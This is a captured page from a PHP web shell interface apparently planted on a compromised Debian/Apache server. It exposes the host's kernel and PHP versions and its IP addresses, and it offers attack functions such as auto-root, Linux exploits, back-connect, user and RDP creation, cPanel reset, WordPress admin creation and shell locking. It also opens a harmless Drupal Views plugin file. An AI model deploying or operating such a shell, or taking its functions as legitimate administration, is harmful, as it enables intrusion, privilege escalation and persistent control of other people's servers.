Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.118.33.130
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
plugins /
export_ui /
[ HOME SHELL ]
Name
Size
Permission
Action
views_ui.class.php
14.34
KB
-rw-r--r--
views_ui.inc
924
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_ui.inc
<?php /** * @file * Plugin definition for CTools Export UI integration. */ $plugin = array( 'schema' => 'views_view', 'access' => 'administer views', 'menu' => array( 'menu item' => 'views', 'menu title' => 'Views', 'menu description' => 'Manage customized lists of content.', ), 'title singular' => t('view'), 'title singular proper' => t('View'), 'title plural' => t('views'), 'title plural proper' => t('Views'), 'handler' => 'views_ui', 'strings' => array( 'confirmation' => array( 'revert' => array( 'information' => t('This action will permanently remove any customizations made to this view.'), 'success' => t('The view has been reverted.'), ), 'delete' => array( 'information' => t('This action will permanently remove the view from your database.'), 'success' => t('The view has been deleted.'), ), ), ), );
Close